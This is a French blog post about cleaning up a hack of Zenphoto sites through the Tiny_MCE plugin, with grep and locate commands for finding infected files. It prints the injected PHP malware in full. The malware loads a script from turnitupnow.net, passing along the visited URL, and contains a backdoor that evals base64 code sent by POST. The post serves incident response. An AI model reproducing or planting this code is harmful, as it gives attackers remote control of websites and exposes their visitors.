30-11-2011

Hack turnitupnow plugin zenphoto …

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11";

Et oui une faille de sécurité provenant d’un plugin Zenphoto… Tiny_MCE exactement, existant sur certains plugins wordpress aussi:

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;}

}

Conséquences.
- Tous vos fichiers php de votre serveur se voient rajouter un code malicieux
- Création de fichier tmp_… infectés

Solutions:

- supprimer l’extension Tiny_MCE de votre répertoire zenphoto
- éditer tous les fichiers php infectés pour retirer les codes (la galère)

Vous croyez vraiment que je vais éditer les milliers de fichiers !!

Et ben non, un petit mélange de perl regex et de find et hop !!

Code utiles

//on trouve les fichiers infectés
root@…:/home# grep -R turnitupnow * | more

//les fichiers tmp_…
updatedb
locate tmp_*

Liens
http://www.zenphoto.org/trac/ticket/2005
http://stackoverflow.com/questions/8068871/got-hacked-anyone-know-what-this-php-code-does

Commentaire pour

Hack turnitupnow plugin zenphoto …

zenphoto

>> Voir tous les tutoriels catégories: zenphoto

Mes sites progs
Zenphoto forum
Progs

Contact me
Dean Kong A Siou

Les derniers articles
WordPress et permaliens, remplacer les apostrophes par un trait
Javascript, formattage de votre code en ligne (beautiful code)
Affaire d’espionnage de google sur safari, les plaintes commencent
Microsoft critique google à travers une vidéo Googlighting , rien d’autre à faire?
Google bombing, on a pas fini d’en entendre parler
Exploiter la mise en cache du navigateur, configuration htaccess
SpiderLing, a SPIDER for LINGustic research
Google espionne safari, microsoft profite de l’occasion avec internet explorer
Nicolas Sarkozy, J’ai besoin de vous pour la France forte => spam ?
muieblackcat, admin, mysql, phpmyadmin, xampp etc … encore des attaques !!
Iphone safari bloqué, comment le débloquer?
incapable de gouverner – on va tuer la france => Google Bombing
WordPress mon anti-spam = plugin-extension WP-Gatekeeper
Twitter 403 Forbidden: The server understood the request … sur chrome
Twitter 403 Forbidden: The server understood the request, but is refusing to fulfill it
Google espionne les visites sur safari des appareil apple-mac-iphone
Filezilla, sauvegarde de la configuration sessions login-mot de passe
Notepad++ sauvegarde configuration session login-password NppFTP
Notepad++ load langs.xml failed : 1 problème = 1 solution
Epidémie de grippe, déclarée depuis le 30 janvier 2012
tim?src=http://flickr.com.bpmohio.com => faille de sécurité timthumb – wordpress
Covoiturage Besançon Clermont Ferrand le 2 mars 2012 = recherche
s.nsdsvc.com/App/DddWrapper.swf => crossdomain.xml
astuces.pratiques3@dbmail.com => spam
Les femmes et twitter par Marie-Laure Sauty de Chalon, Aufeminin.com
Google Screenwise pour être payé par google en naviguant sur chrome
blogger.com.antesagoradepois.com/depois.php : tentative de hack par timthumb
Nom de domaine avec accent, liste des caractères spéciaux autorisés
Nom de domaine avec accent, une histoire d’argent
Analyse de marché Pub/Bar/Club de distrimad@moov.mg : spam
Paypal checker 2012 => new0vpn@gmail.com => paypal checker.rar
Que veut dire dpda = des paroles et des actes
Gmail, impossible d’afficher les paramètres de messagerie ?
Verbatim micro USB Drive logiciel de protection, c’est pas gratuit
Megaupload, récupérer ses données personnelles, lueure d’ espoire ? MegaRetrieval.com
Gmail trier l’affichage par fichiers non lus
w47631836w.php attention => faille zenphoto tiny mce=> congatarcxisi.ru
Mégaupload, récupérer ses fichiers, dur dur fichiers perdus !!
edf-crm.fr, espaceclient@edf-crm.fr, est-ce une fraude ?
EDF Bleu ciel Attention aux e-mails et sites frauduleux espaceclient@edf-crm.fr
Free mon compte : page de connexion à votre compte free
Mémento des activités gymniques, stock épuisé et non renouvellé
Google, un bon référencement avec des titles de 66 à 69 caractères
PayPal a besoin de votre avis ! = arnaque – phishing
Free(c) Veuillez mettre a jour vos coordonnées = arnaque
grep exclure plusieurs mots (NON OU / NOR / a barre et b barre)
grep recherche de plusieurs mots (ET / AND / &)
Windows seven / 7, configuration des ports
Ubuntu, recherche de texte dans dossier et sous dossiers, récursif
Livebox, changer adresse IP
Mégaupload fermé
Telnet Windows 7 / seven
BuiBui-Bot buibui at dadapro dot com
Msdos, ms dos, recherche de fichier avec sous dossiers
Gmail revenir à l’ancienne interface
Msdos, ms dos, ordinateurs du réseau
Tous ensemble, décoratrice Laure Goudin Flesch
Adresse ip des processus, gestionnaire des tâches
Php, générateur de miniature à distance, remote
Feu de cheminée, assurance pacifica crédit agricole
Morteau festival hip-hop le 14 janvier 2012
0633355170 ?
Windows seven 64 activer telnet
blague
Covoiturage Besançon Clermont Ferrand le 23-12-2011
Votre ordinateur est bloqué par la gendarmerie, payez 200 €
Injection SQL :code à risque 1
Perl search replace recursive folder and regex
Hack turnitupnow plugin zenphoto …
Gmail, accusé de réception suite
Gmail, accusé de réception ?
Ubuntu installer GD
VirtualDub 1.9.11 ouvrir un wmv
VirtualDub 1.9.11 redimensionner vidéo
VirtualDub 1.9.11 recadrage – crop vidéo
WordPress, insérer une page dynamiquement
Editeur logiciel assurance vie
Prestashop module, Récupérer la valeur d’une variable
Prestashop gsitemap, retirer les pages cms
Prestashop 1.4.5 liste des catégories pour module
Prestashop 1.4.5… mettre les numéros de tel sur une ligne
Javascript modifier les propriétés css d’une div
Le programme Flash.exe a cessé d’interagir avec Windows
WordPress 3.2 éditer le menu bar
wordpress 3.2.* retirer les widgets de l’admin
Paypal configuration logoImagePosition
Prestashop 1.4.5.1 override 1
Prestashop 1.4.5.1 hook et surcharge exemple 1
So colissimo Flexibilité, installation : document
Prestashop template-modules variables
Prestashop template-module: déclarer une variable
Notepad++ trie par ordre alphabétique
Prestashop 1.4.5.1 registerHook liste
L’équipe Gmail FERMETURE DE VOTRE COMPTE: arnaque
Prestashop: smarty boucle foreach 1
Vhosts ehcp op=applyfordomainaccount
So colissimo flexibilité: connexion aux web services en https
Protection dossier sur free
Prestashop : désactiver les bons de réduction
Prestashop : désactiver emballage recyclé
Salon Bale Basel Baselworld 2012 incontournable
vtt doubs
course doubs
Yonger et Bresson boutique officielle